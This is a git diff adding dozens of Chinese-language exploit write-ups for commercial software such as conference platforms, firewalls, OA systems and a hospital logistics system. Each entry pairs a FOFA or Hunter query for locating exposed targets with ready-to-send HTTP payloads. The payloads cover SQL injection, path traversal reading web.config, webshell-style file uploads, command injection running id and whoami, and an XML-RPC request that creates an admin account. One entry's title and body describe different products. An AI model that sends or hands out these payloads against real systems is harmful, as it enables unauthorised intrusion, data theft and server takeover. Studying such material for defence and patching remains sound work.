Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0 +``` + diff --git a/华望云会议管理平台recodemangerForUser.inc存在SQL注入漏洞.md b/华望云会议管理平台recodemangerForUser.inc存在SQL注入漏洞.md new file mode 100644 index 0000000..6afafa7 --- /dev/null +++ b/华望云会议管理平台recodemangerForUser.inc存在SQL注入漏洞.md 
@@ -0,0 +1,24 @@ +# 华望云会议管理平台recodemangerForUser.inc存在SQL注入漏洞 + +华望云会议管理平台 `recodemangerForUser.inc` 接口处存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。 + +## fofa + +```javascript +title="华望云会议管理平台" +``` + +## poc + +```javascript +POST /page/recodemangerForUser.inc?search=1%25'+and+1%3d(updatexml(0x7e,concat(1,(select+user())),1))+and+'%25%25'+like+'¶ms[]=nName¶ms[]=confName¶ms[]=displayName¶ms[]=status&selectTime=1 HTTP/1.1 +Host: +Cookie: uid=112; JSESSIONID=8E8A139355E2047CEAC6B307396968A8; languageGlobal=1 +Accept-Encoding: gzip, deflate +X-Requested-With: XMLHttpRequest +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0 +Accept: */* +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +``` + +![93b1d1d9d0b14cf1b9ddedc313f2fa8d.png](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409132244574.png) \ No newline at end of file diff --git a/华望云会议管理平台syslog.inc存在SQL注入漏洞.md b/华望云会议管理平台syslog.inc存在SQL注入漏洞.md new file mode 100644 index 0000000..f241bbd --- /dev/null +++ b/华望云会议管理平台syslog.inc存在SQL注入漏洞.md @@ -0,0 +1,23 @@ +# 华望云会议管理平台syslog.inc存在SQL注入漏洞 + +华望云会议管理平台 `syslog.inc` 接口处存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。 + +## fofa + +```javascript +title="华望云会议管理平台" +``` + +## poc + +```javascript +POST /page/syslog.inc?search=1%25'+and+1%3d(updatexml(0x7e,concat(1,(select+user())),1))+and+'%25%25'+like+'¶ms[]=displayName¶ms[]=module¶ms[]=act¶ms[]=ip&selectTime=1 HTTP/1.1 +Host: +Accept-Encoding: gzip, deflate +X-Requested-With: XMLHttpRequest +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Cookie: uid=112; JSESSIONID=8E8A139355E2047CEAC6B307396968A8; languageGlobal=1 +Accept: */* +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0 +``` + 
diff --git a/华望云会议管理平台useractionlist存在SQL注入漏洞.md b/华望云会议管理平台useractionlist存在SQL注入漏洞.md new file mode 100644 index 0000000..7eb9fd5 --- /dev/null +++ b/华望云会议管理平台useractionlist存在SQL注入漏洞.md @@ -0,0 +1,43 @@ +# 华望云会议管理平台useractionlist存在SQL注入漏洞 + +华望云会议管理平台 `useractionlist` 接口处存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。 + +## fofa + +```javascript +title="华望云会议管理平台" +``` + +## poc + +获取cookie + +```javascript +POST /ajax/userlogin HTTP/1.1 +Host: +Accept: */* +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0 +X-Requested-With: XMLHttpRequest + +userNameCopy=admin&userName=admin&passWordCopy=admin&passWord=21232f297a57a5a743894a0e4a801fc3 +``` + +将获取到cookie填入下面poc中 + +```javascript +POST /page/useractionlist?search=1%25'+and+1%3d(updatexml(0x7e,concat(1,(select+user())),1))+and+'%25%25'+like+'&dpId=1¶ms[]=displayName¶ms[]=userName HTTP/1.1 +Host: +X-Requested-With: XMLHttpRequest +Cookie: uid=112; JSESSIONID=8E8A139355E2047CEAC6B307396968A8; languageGlobal=1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0 +Accept-Encoding: gzip, deflate +Accept: */* +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +``` + +![e034ce0d97d2420ea913de1498bfe951.png](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409132251636.png) + +![1b610ed8f77245f99e98203c9b8c2f1b.png](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409132249981.png) \ No newline at end of file diff --git a/华测监测预警系统FileDownLoad.ashx存在任意文件读取漏洞.md b/华测监测预警系统FileDownLoad.ashx存在任意文件读取漏洞.md new file mode 100644 index 0000000..949ebc8 --- /dev/null +++ b/华测监测预警系统FileDownLoad.ashx存在任意文件读取漏洞.md 
@@ -0,0 +1,29 @@ +# 华测监测预警系统FileDownLoad.ashx存在任意文件读取漏洞 + +华测监测预警系统FileDownLoad.ashx存在任意文件读取漏洞,通过读取配置文件获取重要数据。 + +## fofa + +```jade +app="华测监测预警系统2.2" +``` + +```javascript +icon_hash="-628229493" +``` + +## poc + +```javascript +POST /Handler/FileDownLoad.ashx HTTP/1.1 +Host: ip:port +User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1) +Accept-Encoding: gzip, deflate +Accept: */* +Connection: close +Content-Type: application/x-www-form-urlencoded +Content-Length: 40 + +filename=1&filepath=../../web.config +``` + diff --git a/华测监测预警系统任意文件读取漏洞.md b/华测监测预警系统任意文件读取漏洞.md new file mode 100644 index 0000000..d0caebf --- /dev/null +++ b/华测监测预警系统任意文件读取漏洞.md @@ -0,0 +1,37 @@ +# 华测监测预警系统任意文件读取漏洞 + +# 一、漏洞简介 +华测监测预警系统`FileDownload.ashx`存在任意文件读取漏洞。 + +# 二、影响版本 ++ 华测监测预警系统 + +# 三、资产测绘 ++ hunter`app.name="华测监测预警系统"` ++ 登录页面 + +![1693923282566-a270faa1-3ae7-4bcd-9795-dba9dbe4ae6d.png](./img/WAOjDbmD35pXUcus/1693923282566-a270faa1-3ae7-4bcd-9795-dba9dbe4ae6d-950460.png) + +# 四、漏洞复现 +```plain +POST /Handler/FileDownLoad.ashx HTTP/1.1 +Host: xx.xx.xx.xx +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/117.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Connection: close +Cookie: ASP.NET_SessionId=xp2shqaformcuin4cdxhm3ws +Upgrade-Insecure-Requests: 1 +Content-Type: application/x-www-form-urlencoded +Content-Length: 40 + +filename=1&filepath=..%2F..%2Fweb.config +``` + +![1693923344252-dbf6f445-b43a-4d97-b79b-f4755c3d42a3.png](./img/WAOjDbmD35pXUcus/1693923344252-dbf6f445-b43a-4d97-b79b-f4755c3d42a3-713801.png) + + + +> 更新: 2024-02-29 23:55:47 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/rcvtzuhecd5rgas8> \ No newline at end of file diff --git a/华测监测预警系统数据库信息泄露漏洞.md b/华测监测预警系统数据库信息泄露漏洞.md new file mode 100644 index 0000000..1a62de0 --- /dev/null +++ b/华测监测预警系统数据库信息泄露漏洞.md 
@@ -0,0 +1,33 @@ +# 华测监测预警系统数据库信息泄露漏洞 + +# 一、漏洞简介 +华测监测预警系统存在数据库信息泄漏漏洞。 + +# 二、影响版本 ++ 华测监测预警系统 + +# 三、资产测绘 ++ hunter`app.name="华测监测预警系统"` ++ 登录页面 + +![1693923282566-a270faa1-3ae7-4bcd-9795-dba9dbe4ae6d.png](./img/rSk_-194Dns3L8Y8/1693923282566-a270faa1-3ae7-4bcd-9795-dba9dbe4ae6d-646673.png) + +# 四、漏洞复现 +```plain +GET /web/Report/Rpt/Config/Config.xml HTTP/1.1 +Host: xx.xx.xx.xx +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/117.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Connection: close +Cookie: ASP.NET_SessionId=xp2shqaformcuin4cdxhm3ws +Upgrade-Insecure-Requests: 1 +``` + +![1693923526902-2843a031-70e7-4efe-8273-980564d9c277.png](./img/rSk_-194Dns3L8Y8/1693923526902-2843a031-70e7-4efe-8273-980564d9c277-781161.png) + + + +> 更新: 2024-02-29 23:55:47 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/axm90eqn4qtnt32s> \ No newline at end of file diff --git a/协众OA系统接口checkLoginQrCode存在SQL注入漏洞复现.md b/协众OA系统接口checkLoginQrCode存在SQL注入漏洞复现.md new file mode 100644 index 0000000..6bab9b6 --- /dev/null +++ b/协众OA系统接口checkLoginQrCode存在SQL注入漏洞复现.md 
@@ -0,0 +1,25 @@ +# 协众OA系统接口checkLoginQrCode存在SQL注入漏洞复现 + +协众OA checkLoginQrCode 接口存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息。 + +## fofa +```javascript +app="协众软件-协众OA" +``` + +## poc +```javascript +POST /index.php?app=main&func=common&action=commonJob&act=checkLoginQrCode HTTP/1.1 +Host: +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Priority: u=0, i +Upgrade-Insecure-Requests: 1 +Content-Type: application/x-www-form-urlencoded +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0 + +id=(select * from (select sleep(5))z) +``` + +![image-20241219150543058](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412191505120.png) \ No newline at end of file diff --git a/卓软计量业务管理平台image.ashx任意文件读取漏洞.md b/卓软计量业务管理平台image.ashx任意文件读取漏洞.md new file mode 100644 index 0000000..95d1107 --- /dev/null +++ b/卓软计量业务管理平台image.ashx任意文件读取漏洞.md @@ -0,0 +1,19 @@ +# 卓软计量业务管理平台image.ashx任意文件读取漏洞 + +卓软计量业务管理平台 image.ashx 接口存在任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。 + +## fofa +```javascript +icon_hash="-334571363" +``` + +## poc +```javascript +GET /HuameiMeasure/image.ashx?image_path=./../web.config HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0 +Accept-Encoding: gzip, deflate +Connection: close +``` + +![image-20241227214332200](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412272143297.png) \ No newline at end of file diff --git a/南京博纳睿通软件科技有限公司医院一站式后勤管理系统processApkUpload存在任意文件上传漏洞.md b/南京博纳睿通软件科技有限公司医院一站式后勤管理系统processApkUpload存在任意文件上传漏洞.md new file mode 100644 index 0000000..268fab2 --- /dev/null +++ b/南京博纳睿通软件科技有限公司医院一站式后勤管理系统processApkUpload存在任意文件上传漏洞.md 
@@ -0,0 +1,46 @@ +# 南京博纳睿通软件科技有限公司医院一站式后勤管理系统processApkUpload存在任意文件上传漏洞 + +# 一、漏洞简介 +医院后勤综合管理平台(Hospital Logistics Management Platform,以下简称HLMP)基于现代医院后勤管理理念,结合后勤业务管理特点,通过管理平台将后勤管理业务予以系统化、规范化和流程化,从而形成一套构建于平台之上且成熟完善的后勤管理体系,并可在此体系上充分挖掘管理潜力,以提高工作效率、加强有效沟通、降低管理成本、辅助管理决策。 南京博纳睿通软件科技有限公司医院后勤保障管理系统processApkUpload存在任意文件上传漏洞,攻击者可通过该漏洞获取服务器权限。 + +# 二、影响版本 ++ 南京博纳睿通软件科技有限公司医院后勤保障管理系统 + +# 三、资产测绘 ++ fofa`body="frameworkModuleJob" ` ++ 特征 + +![1711205380423-60b78e14-9101-4ae8-8a9d-bd2b7c184593.png](./img/Z1w4oHFdZ1FH_2QG/1711205380423-60b78e14-9101-4ae8-8a9d-bd2b7c184593-320960.png) + +# 四、漏洞复现 +```plain +POST /ajaxinvoke/frameworkModuleJob.processApkUpload.upload HTTP/1.1 +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36 +Content-Type: multipart/form-data; boundary=00content0boundary00 +Host: +Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 +Connection: close +Content-Length: 197 + +--00content0boundary00 +Content-Disposition: form-data; name="Filedata"; filename="stc.jsp" +Content-Type: application/octet-stream + +<% out.println("123");%> +--00content0boundary00-- +``` + +![1711211118920-85b8938f-02a2-4ef6-b68d-35c00b5edf78.png](./img/Z1w4oHFdZ1FH_2QG/1711211118920-85b8938f-02a2-4ef6-b68d-35c00b5edf78-868233.png) + +根据响应获取上传文件位置 + +```plain +/apk/33/stc.jsp +``` + +![1711211148919-d8550b80-ea67-4bff-908d-2d214c4adc9a.png](./img/Z1w4oHFdZ1FH_2QG/1711211148919-d8550b80-ea67-4bff-908d-2d214c4adc9a-945275.png) + + + +> 更新: 2024-04-20 22:05:29 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/az2vflngvgmzr9ew> \ No newline at end of file diff --git a/南京星源图科技SparkShop存在任意文件上传漏洞.md b/南京星源图科技SparkShop存在任意文件上传漏洞.md new file mode 100644 index 0000000..fc3c317 --- /dev/null +++ b/南京星源图科技SparkShop存在任意文件上传漏洞.md 
@@ -0,0 +1,44 @@ +# 南京星源图科技SparkShop存在任意文件上传漏洞 + +南京星源图科技SparkShop商城存在任意文件上传漏洞,攻击者可获取服务器权限。 + +## fofa + +```yaml +"SparkShop" +``` + +## poc + +```java +POST /api/Common/uploadFile HTTP/2 +Host: +Cache-Control: max-age=0 +Sec-Ch-Ua: "Not)A;Brand";v="99", "Google Chrome";v="127", "Chromium";v="127" +Sec-Ch-Ua-Mobile: ?0 +Sec-Ch-Ua-Platform: "macOS" +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Sec-Fetch-Site: none +Sec-Fetch-Mode: navigate +Sec-Fetch-User: ?1 +Sec-Fetch-Dest: document +Accept-Encoding: gzip, deflate, br +Accept-Language: zh-CN,zh;q=0.9 +Priority: u=0, i +Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryj7OlOPiiukkdktZR +Content-Length: 178 + +------WebKitFormBoundaryj7OlOPiiukkdktZR +Content-Disposition: form-data; name="file";filename="1.php" + +<?php echo"hello world";?> +------WebKitFormBoundaryj7OlOPiiukkdktZR-- +``` + + + +## 漏洞来源 + +- https://mp.weixin.qq.com/s/xrdAT9NE6Z5s7OoiJdnd-w \ No newline at end of file diff --git a/博华网龙安全设备cmd.php远程命令执行漏洞.md b/博华网龙安全设备cmd.php远程命令执行漏洞.md new file mode 100644 index 0000000..b176bc2 --- /dev/null +++ b/博华网龙安全设备cmd.php远程命令执行漏洞.md 
@@ -0,0 +1,37 @@ +# 博华网龙安全设备cmd.php远程命令执行漏洞 + +# 一、漏洞简介 +中科博华是一家集科研、产品开发、技术服务、系统集成为一体的高科技企业,是国家商用密码产品定点生产单位,具有商用密码生产和销售许可证、3C认证、系统集成叁级资质、信息安全服务一级资质和涉密资质等。中科博华多个安全设备系统存在远程代码执行漏洞,攻击者通过漏洞可以获取服务器权限。 + +# 二、影响版本 ++ 博华网龙防火墙 ++ 博华网龙信息安全一体机 ++ 博华网龙安全网关 + +# 三、资产测绘 ++ hunter`web.title="博华网龙"` ++ 特征 + +![1696566856436-c5c98016-9190-4ff0-a67e-becd89d83102.png](./img/Yaw0bhzWq8eQpP9I/1696566856436-c5c98016-9190-4ff0-a67e-becd89d83102-746962.png) + +# 四、漏洞复现 +**poc1:** + +```plain +/diagnostics/cmd.php?action=arping&ifName=|id|| +``` + +![1696566921516-95ed8ce9-77e0-4146-bdc6-63c346ac5baf.png](./img/Yaw0bhzWq8eQpP9I/1696566921516-95ed8ce9-77e0-4146-bdc6-63c346ac5baf-114102.png) + +**poc2:** + +```plain +/diagnostics/cmd.php?action=ping&count=||id|| +``` + +![1696566937647-b84f3c0a-7dc7-48e4-a1c4-c3c3b87510cc.png](./img/Yaw0bhzWq8eQpP9I/1696566937647-b84f3c0a-7dc7-48e4-a1c4-c3c3b87510cc-081162.png) + + + +> 更新: 2024-02-29 23:57:14 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ognnq9azp0fodi9b> \ No newline at end of file diff --git a/博斯外贸管理软件logined.jsp存在SQL注入漏洞.md b/博斯外贸管理软件logined.jsp存在SQL注入漏洞.md new file mode 100644 index 0000000..fe28031 --- /dev/null +++ b/博斯外贸管理软件logined.jsp存在SQL注入漏洞.md 
@@ -0,0 +1,25 @@ +# 博斯外贸管理软件logined.jsp存在SQL注入漏洞 + +博斯外贸管理软件V6.0 logined.jsp 接口存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。 + +## fofa +```javascript +title="欢迎使用 博斯软件" +``` + +## poc +```javascript +POST /log/logined.jsp HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0 +Accept: */* +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate, br, zstd +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +Connection: keep-alive + +Submit=-1&account=-1&password=1%27+AND+9085+IN+%28SELECT+%28CHAR%28113%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%28107%29%2BCHAR%28113%29%2B%28SELECT+%28CASE+WHEN+%289085%3D9085%29+THEN+CHAR%2849%29+ELSE+CHAR%2848%29+END%29%29%2BCHAR%28113%29%2BCHAR%28118%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%28113%29%29%29+AND+%27GSSe%27%3D%27GSSe +``` + +![image-20241227215420546](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412272154610.png) \ No newline at end of file diff --git a/博斯外贸管理软件loginednew.jsp存在SQL注入漏洞.md b/博斯外贸管理软件loginednew.jsp存在SQL注入漏洞.md new file mode 100644 index 0000000..c09dc9e --- /dev/null +++ b/博斯外贸管理软件loginednew.jsp存在SQL注入漏洞.md 
@@ -0,0 +1,21 @@ +# 博斯外贸管理软件loginednew.jsp存在SQL注入漏洞 + +博斯外贸管理软件V6.0 loginednew.jsp 接口存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。 + +## fofa +```javascript +title="欢迎使用 博斯软件" +``` + +## poc +```javascript +GET /loginednew.jsp?welcome=%BB%B6%D3%AD%CA%B9%D3%C3%20%B2%A9%CB%B9%C8%ED%BC%FEV6.0(20110701)&systemname=BS&account=1%27+UNION+ALL+SELECT+NULL%2CNULL%2CCHAR%28113%29%2BCHAR%28107%29%2BCHAR%28118%29%2BCHAR%28112%29%2BCHAR%28113%29%2BCHAR%28117%29%2BCHAR%28115%29%2BCHAR%28111%29%2BCHAR%28109%29%2BCHAR%28106%29%2BCHAR%2887%29%2BCHAR%28103%29%2BCHAR%2888%29%2BCHAR%28113%29%2BCHAR%2890%29%2BCHAR%28117%29%2BCHAR%2874%29%2BCHAR%28101%29%2BCHAR%28117%29%2BCHAR%28118%29%2BCHAR%28113%29%2BCHAR%2879%29%2BCHAR%2883%29%2BCHAR%2886%29%2BCHAR%28104%29%2BCHAR%2868%29%2BCHAR%2889%29%2BCHAR%28107%29%2BCHAR%2874%29%2BCHAR%2887%29%2BCHAR%2871%29%2BCHAR%28115%29%2BCHAR%28121%29%2BCHAR%2873%29%2BCHAR%28114%29%2BCHAR%2882%29%2BCHAR%2866%29%2BCHAR%28115%29%2BCHAR%2882%29%2BCHAR%2872%29%2BCHAR%28117%29%2BCHAR%28106%29%2BCHAR%28121%29%2BCHAR%2880%29%2BCHAR%28117%29%2BCHAR%28113%29%2BCHAR%28112%29%2BCHAR%28120%29%2BCHAR%28120%29%2BCHAR%28113%29%2CNULL--+EqLf&password=1&val=0000&availHeight=834&Safari=Y&loginurl= HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Connection: keep-alive +``` + +![image-20241227215249023](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412272152097.png) \ No newline at end of file diff --git a/博斯软件V6.0存在sql注入.md b/博斯软件V6.0存在sql注入.md new file mode 100644 index 0000000..8f61e95 --- /dev/null +++ b/博斯软件V6.0存在sql注入.md 
@@ -0,0 +1,59 @@ +# 博斯软件V6.0 存在 sql 注入 + +# 一、漏洞简介 +福建博思软件股份有限公司博斯软件V6.0 log/logined.jsp存在SQL注入漏洞。 + +# 二、影响版本 ++ 博斯软件V6.0 + +# 三、资产测绘 ++ hunter`web.title:"欢迎使用 博斯软件"` ++ 特征 + +![1697813092548-472a2527-ceb8-41ff-874b-32ce4c0e7ebe.png](./img/qesLgT3zkCECCWG7/1697813092548-472a2527-ceb8-41ff-874b-32ce4c0e7ebe-167743.png) + +# 四、漏洞复现 +```java +POST /log/logined.jsp HTTP/1.1 +Content-Type: application/x-www-form-urlencoded +X-Requested-With: XMLHttpRequest +Cookie: JSESSIONID=80D835813F9733E867790648CBAA0EC6 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Encoding: gzip,deflate +Content-Length: 106 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4298.0 Safari/537.36 +Host: xx.xx.xx.xx +Connection: Keep-alive + +Submit=-1A&account=-1password=g-1';WAITFOR DELAY '0:0:5'-- +``` + +![1697813144963-54dfd143-ad16-466e-accc-847ad43268c6.png](./img/qesLgT3zkCECCWG7/1697813144963-54dfd143-ad16-466e-accc-847ad43268c6-568851.png) + +sqlmap + +```java +POST /log/logined.jsp HTTP/1.1 +Content-Type: application/x-www-form-urlencoded +X-Requested-With: XMLHttpRequest +Cookie: JSESSIONID=80D835813F9733E867790648CBAA0EC6 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Encoding: gzip,deflate +Content-Length: 106 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4298.0 Safari/537.36 +Host: xx.xx.xx.xx +Connection: Keep-alive + +Submit=-1A&account=-1password=g-2 +``` + +```java +sqlmap -r 1.txt --batch --level 3 --thread 5 +``` + +![1697813586437-c2b66328-c97f-4130-b663-8b4fe9ae5e07.png](./img/qesLgT3zkCECCWG7/1697813586437-c2b66328-c97f-4130-b663-8b4fe9ae5e07-922009.png) + + + +> 更新: 2024-02-29 23:55:47 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/zprm44mso2ysykrg> \ No newline at end of file 
diff --git a/博达下一代防火墙aaa_portal_auth_local_submit存在命令执行漏洞.md b/博达下一代防火墙aaa_portal_auth_local_submit存在命令执行漏洞.md new file mode 100644 index 0000000..3ddfa18 --- /dev/null +++ b/博达下一代防火墙aaa_portal_auth_local_submit存在命令执行漏洞.md 
@@ -0,0 +1,117 @@ +# 博达下一代防火墙aaa_portal_auth_local_submit存在命令执行漏洞 + +# 一、漏洞简介 +安恒明御运维审计与风险控制系统(简称“DASUSM”)是一款基于运维安全管理的理论和实践经验,结合各类法律法规(如等级保护、赛班斯法案SOX、PCI、企业内控管理、分级保护、ISO/IEC 27001等)对运维审计的要求,采用B/S架构,集“身份认证(Authentication)、账户管理(Account)、控制权限(Authorization)、日志审计(Audit)”于一体,支持多种字符终端协议、文件传输协议、图形终端协议、远程应用协议的安全监控与历史查询,具备全方位运维风险控制能力的统一安全管理与审计产品。安恒明御运维审计风险控制系统(堡垒机)存在任意用户添加漏洞,攻击者可利用该漏洞添加用户登录堡垒机。 + +# 二、影响版本 ++ 安恒明御运维审计与风险控制系统 + +# 三、资产测绘 ++ hunter:`app.name=="安恒明御运维审计与风险控制系统"` + +![1691393320775-2fcf53cd-f670-4d22-a04e-ae7f76d4cb44.png](./img/SZ4CFa0jWYPgqgUv/1691393320775-2fcf53cd-f670-4d22-a04e-ae7f76d4cb44-236122.png) + ++ 首页 + +![1691393366555-3c70041c-447d-415f-a6e6-bd852a153318.png](./img/SZ4CFa0jWYPgqgUv/1691393366555-3c70041c-447d-415f-a6e6-bd852a153318-596904.png) + +# 四、漏洞复现 +使用exp添加用户`qaxnb666/Admin123..` + +```java +POST /service/?unix:/../../../../var/run/rpc/xmlrpc.sock|http://test/wsrpc HTTP/1.1 +Host: xx.xx.xx.xx +Content-Length: 1112 + +<?xml version="1.0"?> +<methodCall> +<methodName>web.user_add</methodName> +<params> +<param> +<value> +<array> +<data> +<value> +<string>admin</string> +</value> +<value> +<string>5</string> +</value> +<value> +<string>10.17.1.1</string> +</value> +</data> +</array> +</value> +</param> +<param> +<value> +<struct> +<member> +<name>uname</name> +<value> +<string>qaxnb666</string> +</value> +</member> +<member> +<name>name</name> +<value> +<string>yuwe</string> +</value> +</member> +<member> +<name>pwd</name> +<value> +<string>Admin123..</string> +</value> +</member> +<member> +<name>authmode</name> +<value> +<string>1</string> +</value> +</member> +<member> +<name>deptid</name> +<value> +<string></string> +</value> +</member> +<member> +<name>email</name> +<value> +<string></string> +</value> +</member> +<member> +<name>mobile</name> +<value> +<string></string> +</value> +</member> +<member> +<name>comment</name> +<value> +<string></string> +</value> +</member> +<member> +<name>roleid</name> +<value> +<string>101</string> 
+</value> +</member> +</struct></value> +</param> +</params> +</methodCall> +``` + +![1691393678758-f523c4a1-eb67-42fb-ae42-b3bb5c838378.png](./img/SZ4CFa0jWYPgqgUv/1691393678758-f523c4a1-eb67-42fb-ae42-b3bb5c838378-989984.png) + +![1691393729985-1a6856f8-5697-483e-a696-b7f1f69a28e9.png](./img/SZ4CFa0jWYPgqgUv/1691393729985-1a6856f8-5697-483e-a696-b7f1f69a28e9-817517.png) + + + +> 更新: 2024-07-17 17:37:51 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ha1dzr2395nad5m3> \ No newline at end of file diff --git a/博达下一代防火墙sslvpn_client存在远程命令执行漏洞.md b/博达下一代防火墙sslvpn_client存在远程命令执行漏洞.md new file mode 100644 index 0000000..8523258 --- /dev/null +++ b/博达下一代防火墙sslvpn_client存在远程命令执行漏洞.md 
@@ -0,0 +1,41 @@ +# 博达下一代防火墙sslvpn_client存在远程命令执行漏洞 + +# 一、漏洞简介 +博达下一代防火墙sslvpn_client存在远程命令执行漏洞,攻击者可通过该漏洞获取服务器权限。 + +# 二、影响版本 ++ 博达下一代防火墙 + +# 三、资产测绘 ++ hunter`web.title=="博达下一代防火墙"`||`web.title=="博达上网行为管理"` ++ 特征 + +![1701763514488-337ef992-b1b8-4613-be19-61a335aefe7c.png](./img/KFOD6d47fNNCV5ke/1701763514488-337ef992-b1b8-4613-be19-61a335aefe7c-234395.png) + +# 四、漏洞复现 +```java +GET /sslvpn/sslvpn_client.php?client=logoImg&img=x%20/tmp|echo%20%60whoami%60%20|tee%20/usr/local/webui/sslvpn/ceshi.txt|ls HTTP/1.1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 +Host: xx.xx.xx.xx +Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 +Connection: close +``` + 